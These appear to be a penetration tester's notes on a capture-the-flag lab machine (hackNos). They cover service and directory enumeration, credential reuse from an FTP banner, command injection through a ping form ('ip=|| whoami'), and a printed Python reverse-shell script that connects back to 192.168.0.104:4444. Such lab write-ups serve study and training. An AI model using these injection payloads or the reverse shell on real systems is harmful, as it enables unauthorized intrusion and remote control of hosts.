1) Enumeration: 
	- VM IP: sudo netdiscover
		* VMWare 192.168.1.12
	- VM info: nmap -A 192.168.1.12
		* 21/tcp open  ftp  
			Anonymous log-in is on. --> banner "ftp 'Security@hackNos'"
		* 22/tcp open  ssh
		* 80/tcp open  http

	- web server info: dirb -w http://192.168.1.12 & 
		* http://192.168.1.12/index.html
		* http://192.168.1.12/css/style.css
		* http://192.168.1.12/css/2.jpg

	- web server 192.168.1.12/5ecure login using the :
		* admin:Security@hackNos <-- Banner

	- web server info: dirb -w http://192.168.1.12/5ecure		
		* http://192.168.1.12/5ecure/index.html
			form POSTs data to output.php
		* http://192.168.1.12/5ecure/css/style.css
		* http://192.168.1.12/5ecure/css/2.jpg
		* http://192.168.1.12/5ecure/output.php
			simple ping <ip> function

2) Pene:
	- 192.168.1.12/5ecure/out.php -> exec(ping $ip) -> injection 
		* $ip = || command 
			';/&&/& + command' didn't work, char escape or header conflict
	- ip=|| whoami 
		* www-data
	- ip=|| export
		* export APACHE_LOCK_DIR='/var/lock/apache2'
		* export APACHE_LOG_DIR='/var/log/apache2'
		* export APACHE_PID_FILE='/var/run/apache2/apache2.pid'
		* export APACHE_RUN_DIR='/var/run/apache2'
		* export APACHE_RUN_GROUP='www-data'
		* export APACHE_RUN_USER='www-data'
		* export INVOCATION_ID='e514c3c1dbef4f068ab8124007ec59a6'
		* export JOURNAL_STREAM='9:21541'
		* export LANG='C'
		* export PATH='/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin'
		* export PWD='/var/www/recon/5ecure'		
	- ip=|| ls 
		* system navigation
	- ip=|| vi *file*
		* privilege check


	- intresting files:
		* /var/opt/python.py
			



!) Files:
	- /var/opt/python.py:
		
		import socket
		import subprocess
		import os
		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.connect(("192.168.0.104", 4444))
		os.dup2(s.fileno(), 0)
		os.dup2(s.fileno(), 1)
		os.dup2(s.fileno(), 2)
		p = subprocess.call(["/bin/bash", "-i"])
		
